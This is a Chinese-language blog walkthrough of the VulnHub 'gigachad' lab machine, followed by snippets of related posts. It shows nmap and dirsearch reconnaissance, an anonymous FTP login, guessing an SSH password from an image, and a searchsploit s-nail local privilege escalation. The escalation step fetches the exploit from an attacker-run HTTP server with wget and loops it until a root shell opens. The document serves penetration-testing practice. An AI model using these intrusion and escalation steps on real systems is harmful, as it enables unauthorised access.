VulnHub:gigachad

于 2024-07-24 18:24:03 发布
阅读量244 收藏 8
点赞数 14
分类专栏: VulnHub 文章标签: 网络安全 linux web安全 安全 笔记 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/140667734
版权

靶机下载地址

信息收集

主机发现

扫描攻击机同网段存活主机。nmap 192.168.31.0/24 -Pn -T4

目标机ip:192.168.31.227

端口扫描

对目标机进行全面扫描。nmap 192.168.31.227 -A -p- -T4

开放了ftp、ssh、http服务,扫描结果重点告诉我们两个信息点:

  1. ftp服务版本。vsftpd 3.0.3

  2. http的目录:/robots.txt,/kingchad.html。

目录扫描

访问http服务。首页除了点题的gigachad图片,还有个小彩蛋,感兴趣的可以解密看看。

dirsearch -u http://192.168.31.227

扫出很多目录,筛选了一些可疑路径访问,没啥发现。有WordPress相关的目录,但是很遗憾这里没有通过WordPress来渗透的可能。前面nmap端口扫描时有两个路径,访问一下。

/robots。指向路径/kingchad.html。

/kingchad.html。图片文字翻译是:英国军情五处,军情六处吗,这里有黑客入侵我。

渗透

ftp弱口令

http服务没有收集到有用信息,转战ftp,根据前面端口扫描得到的信息ftp vsftpd 3.0.3,百度发现该ftp版本存在弱口令漏洞。

ftp 192.168.31.227
# 用户名和密码都是ftp

成功登录ftp服务器。进一步渗透,发现chadinfo文件。

将文件下载到本地get chadinfo。提示用户名是chad,并且密码在/drippinchad.png中。

访问/drippinchad.png。图片文字翻译是:你怎么知道?这是我最喜欢的放松地点。

密码就是图片中景观地点,用ChatGTP或者百度,结果是:图像中突出的建筑物是少女塔(Kız Kulesi),位于土耳其伊斯坦布尔博斯普鲁斯海峡南部入口的一个小岛上。直接用Kız Kulesi尝试登录ssh,密码错误,搜一下英文名。

Maiden's Tower,多次尝试后得到密码是maidenstower

顺利找到flag 1/2。

提权

find / -perm -u=s -type f 2>/dev/null

发现一个可利用的文件s-nail-privsep。s-nail是用于发送邮件的命令。

searchsploit找一下有没有可利用的exp,searchsploit s-nail

刚好有本地提权的exp,但是有版本要求,需要确认一下目标机s-nail的版本,s-nail -V,符合exp的利用前提。

把exp放到目标机中。

# 攻击机
searchsploit -m 47172.py //将exp复制到本地
python3 -m http.server   //exp同目录下开启一个简易http服务
​
#目标机 
wget http://攻击机ip:port/47172.sh  //下载exp

使用exp前确保有执行权限,./47172.sh,等待提权成功。

如果提示提权失败,可以尝试写个循环while true;do ./47172.sh;done

得到一个交互式shell,执行以下命令。

python3 -c 'import pty;pty.spawn("/bin/bash")

​​​​​​​

get root flag🎆

Aukum
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场渗透之:Gigachad
qq_32660043的博客
03-12 1671
VulnHub靶场渗透系列(一)
VulnHub-GIGACHAD: 1
sanqin_的博客
07-11 224
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可见开放了三个,21:ftp,22:ssh,80:http 在http里探索一阵后无果(网页作者埋了彩蛋) ftp这边用匿名用户登入后得到了一个文件 说明了用户名和密码,不过密码给的是一个地址,拼接url就可以打开
vulnhub靶机gigachad_vh
m0_73248913的博客
11-28 429
vulnhub靶机
VulnHubGigachad靶机
weixin_51446936的博客
06-09 1085
VulnHub是一个丰富的实战靶场集,里面有许多有趣的实战靶机。 一、环境搭建 1.靶机下载 靶机下载地址:http://www.vulnhub.com/entry/gigachad-1,657/ 2.导入靶机 第一步:导入(打开虚拟机–>选择下载的靶机–>选择存储路径–>导入) 注:会报导入失败的错误,点击重试即可。 第二步:导入后,删除网卡并重新添加(NAT网卡) 第三步:解决虚拟机无法分配ip (1)启动虚拟机,出现这个界面,按e (2)将此处的ro替换为rw signie
Vulnhub_gigachad_vh
qq_45434762的博客
03-20 454
主机信息kali:192.168.1.11 gigachad_vh:192.168.1.10 信息收集通过nmap扫描获得目标主机IP为192.168.1.10并且开放21、22、80端口...
vulnhub Gigachad 靶场练习
鸥鹭忘机
08-07 1373
前言 这次我们练习的靶机是从vulnhub下载的靶机Gigachad:1,该靶机的难易程度为简单。 下载地址为https://www.vulnhub.com/entry/gigachad-1,657/。 首先下载下来,导入虚拟机。官网建议使用的虚拟机为Virtualbox,但是我平时用的VMware,所以这次练习就用VMware做演示。 导入虚拟机 导入虚拟机后把网络连接改为NAT连接模式。桥接模式和NAT模式都是可以的,这里不使用桥接模式是为了避免扫描到C段的其他物理主机。 NAT模式下,虚拟机与物理机
渗透测试靶机:gigachad
m0_70830611的博客
03-25 224
靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/将此处的ro quiet替换为rw signie init=/bin/bash。然后修改下网卡配置文件,将enp0s3改为ens33。根据nmap的信息,存在ftp匿名登陆。这边有点没看懂为啥,搜了下别人的解析。首先,解决虚拟机无法分配ip。使用kali进行扫描。
vulnhub GIGACHAD:1
cawwwww的博客
12-26 319
可以看出得出了很多东西,搜索出来这么多文件,我通过 strings命令以文本的形式显示每个二进制文件,但是经过分析后没有看出可以利用的文件。再输入ls看看里面有什么,发现有个user.txt,猜测可能是我们需要的东西,输入cat user.txt获取到了我们的第一个flag。从这里面知道,用户名为chad,密码我们暂时还不知道,但是给了我们一个提示,让我们去图片这个地址。发现有一个可以利用的脚本,但是他的版本有要求,我们进去看看当前版本为多少,可以看出可以利用。得到root权限查看falg。
vulnhub Gigachad靶场练习
qq_51283187的博客
08-21 326
vulnhub Gigachad靶场练习 把IP的问题解决好,然后就开始渗透了! 首先信息收集,nmap 先ifconfig看看kali处于哪个C段 我这边是192.168.43.0/24 所以 nmap -sn --min-parallelism 100 --min-hostgroup 256 192.168.43.0/24 探测存活的主机 -sn 代表存活主机扫描,不进行端口测探。 –min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8346
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux:基础命令学习
qq_55038440的博客
07-20 1103
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
GNU/Linux - Bazaar版本管理工具
最新发布
guoqx的专栏
07-24 291
根据 Jelmer Vernooij 的说法,Canonical 的 Bazaar 团队的成员在 2012 年初被分配到不同的任务,他本人在7年来为该项目做出贡献后,于2012年底停止了对 Bazaar 的贡献。同样,Bugzilla项目在2014 3月从 Bazaar 改为使用 git,其中一个原因是 Bazaar 几乎已被放弃的印象:“每个月可能有 2-3 次向主干提交。并用来进行Ubuntu项目的版本控制。Bazaar 可以由一个开发本地内容的多个分支的开发人员使用,也可以由跨网络协作的团队使用。
Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 1065
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值